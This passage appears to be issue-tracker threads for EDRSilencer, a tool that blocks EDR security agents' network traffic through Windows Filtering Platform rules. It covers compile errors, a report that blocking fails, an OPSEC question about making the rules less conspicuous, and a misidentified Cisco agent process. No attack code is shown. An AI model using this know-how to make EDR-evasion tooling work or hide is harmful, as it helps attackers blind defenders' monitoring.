      |                  ^~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:413:27: error: ‘FWP_E_IN_USE’ undeclared (first use in this function); did you mean ‘STG_E_INUSE’?
  413 |             if (result != FWP_E_IN_USE) {
      |                           ^~~~~~~~~~~~
      |                           STG_E_INUSE
EDRSilencer.c:413:27: note: each undeclared identifier is reported only once for each function it appears in
EDRSilencer.c: In function ‘UnblockWfpFilter’:
EDRSilencer.c:445:24: error: ‘FWP_E_FILTER_NOT_FOUND’ undeclared (first use in this function); did you mean ‘ERROR_FILE_NOT_FOUND’?
  445 |     else if (result == FWP_E_FILTER_NOT_FOUND) {
      |                        ^~~~~~~~~~~~~~~~~~~~~~
      |                        ERROR_FILE_NOT_FOUND
EDRSilencer.c:454:27: error: ‘FWP_E_IN_USE’ undeclared (first use in this function); did you mean ‘STG_E_INUSE’?
  454 |             if (result != FWP_E_IN_USE) {
      |                           ^~~~~~~~~~~~
      |                           STG_E_INUSE

Blocking doesn't work

Hey,
I tried the release binary and also tried to compile my own (BTW, it was really challenging to compile successfully; GCC could not compile it and VS required a few modifications to succeed), and the WFP blocking doesn't effectively block the network traffic of the binary. I tried a number of binaries.
We can clearly see that the rule was added successfully (e.g. via netsh wfp show state), but the process can still communicate.

Empty Provider

Hi,

Is it intentional that the tool does not add or link to an existing WFP provider?
The rules stand out because of this (from an OPSEC perspective).

Regards
K4nfr3

Process name collision for Cisco Secure Endpoint (Formerly Cisco AMP)

The Cisco Secure Endpoint agent runs as sfc.exe, which is also the process name of the Windows file system checker. I'm not sure if this would cause issues, but it would at least cause the program to incorrectly identify the host as running Cisco Secure Endpoint.

Default path: C:\Program Files\Cisco\AMP\X.X.X\sfc.exe (X.X.X denotes the version number)
